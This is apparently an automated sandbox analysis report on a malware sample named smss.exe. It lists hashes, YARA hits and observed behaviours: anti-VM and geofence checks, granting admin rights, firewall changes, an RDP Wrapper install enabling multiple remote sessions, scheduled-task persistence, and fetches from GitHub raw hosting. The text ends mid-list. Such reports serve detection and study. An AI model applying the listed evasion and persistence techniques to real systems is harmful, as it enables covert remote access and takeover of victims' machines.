Analysis
-
max time kernel
596s -
max time network
600s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
26-04-2024 13:52
General
-
Target
smss.exe
-
Size
9.2MB
-
MD5
53b92442e012db2fc2ee7dc22ee932a9
-
SHA1
750d3f0ac227ccaa2c2a86859cffa4a2ac7cb1d1
-
SHA256
776217117d4b2ecdb07b8a182581e4fd562c0a5785340f86100cf5c1b4eff62e
-
SHA512
b64301d65f48f76855ad89723a933f6e25478ae3a5bcc35cbef81badd08d6dc565d41b51b46a9ab1ad750f0dfa81bffc3c4e6b3b5708f49fd937c948d674c430
-
SSDEEP
196608:uDL2f4ARa+Yw//FpKv45ZhxE5ckWxoUPTYC39SGVy32idMfeaq6p:2L2f4ARaat64fhuWxjBE2SMfeaq6p
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5564 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation AutoIt-Extractor-net40-x64.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 15 IoCs
pid Process 3640 winserv.exe 4776 winserv.exe 5192 RDPWinst.exe 5648 winserv.exe 5540 winserv.exe 3164 AutoIt-Extractor-net40-x64.exe 2008 aut62312.exe 4620 winserv.exe 6136 winserv.exe 5196 winserv.exe 624 winserv.exe 3920 winserv.exe 4144 winserv.exe 5080 winserv.exe 732 winserv.exe -
Loads dropped DLL 1 IoCs
pid Process 808 svchost.exe -
resource yara_rule behavioral1/memory/4528-0-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-3-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-2-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-4-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-5-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-8-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-7-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-9-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-6-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-67-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-311-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/memory/4528-392-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp themida behavioral1/files/0x0009000000023524-620.dat themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 91 raw.githubusercontent.com 87 raw.githubusercontent.com 88 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 100 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/4528-3-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-4-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-5-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-8-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-7-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-9-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-6-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-67-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-311-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/memory/4528-392-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp autoit_exe behavioral1/files/0x0009000000023524-620.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4528 smss.exe -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification \??\c:\program files\rdp wrapper\rdpwrap.txt svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1832 schtasks.exe 2384 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2644 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" AutoIt-Extractor-net40-x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 AutoIt-Extractor-net40-x64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff AutoIt-Extractor-net40-x64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "4" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2177723727-746291240-1644359950-1000\{8FCC78B2-F2EF-43CD-80C3-AFD4027A9940} msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" AutoIt-Extractor-net40-x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" AutoIt-Extractor-net40-x64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 AutoIt-Extractor-net40-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings AutoIt-Extractor-net40-x64.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 211157.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 538827.crdownload:SmartScreen msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 5336 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4176 msedge.exe 4176 msedge.exe 4200 msedge.exe 4200 msedge.exe 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 4776 winserv.exe 4776 winserv.exe 4776 winserv.exe 4776 winserv.exe 5880 identity_helper.exe 5880 identity_helper.exe 808 svchost.exe 808 svchost.exe 808 svchost.exe 808 svchost.exe 3032 msedge.exe 3032 msedge.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe 4528 smss.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3640 winserv.exe Token: SeTakeOwnershipPrivilege 4776 winserv.exe Token: SeTcbPrivilege 4776 winserv.exe Token: SeTcbPrivilege 4776 winserv.exe Token: SeDebugPrivilege 5192 RDPWinst.exe Token: SeAuditPrivilege 808 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe 3872 msedge.exe -
Suspicious use of SetWindowsHookEx 56 IoCs
pid Process 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 3640 winserv.exe 4776 winserv.exe 4776 winserv.exe 4776 winserv.exe 4776 winserv.exe 5648 winserv.exe 5648 winserv.exe 5648 winserv.exe 5648 winserv.exe 5540 winserv.exe 5540 winserv.exe 5540 winserv.exe 5540 winserv.exe 2008 aut62312.exe 4620 winserv.exe 4620 winserv.exe 4620 winserv.exe 4620 winserv.exe 3164 AutoIt-Extractor-net40-x64.exe 3164 AutoIt-Extractor-net40-x64.exe 6136 winserv.exe 6136 winserv.exe 6136 winserv.exe 6136 winserv.exe 5196 winserv.exe 5196 winserv.exe 5196 winserv.exe 5196 winserv.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 624 winserv.exe 624 winserv.exe 624 winserv.exe 624 winserv.exe 3920 winserv.exe 3920 winserv.exe 3920 winserv.exe 3920 winserv.exe 4144 winserv.exe 4144 winserv.exe 4144 winserv.exe 4144 winserv.exe 5080 winserv.exe 5080 winserv.exe 5080 winserv.exe 5080 winserv.exe 732 winserv.exe 732 winserv.exe 732 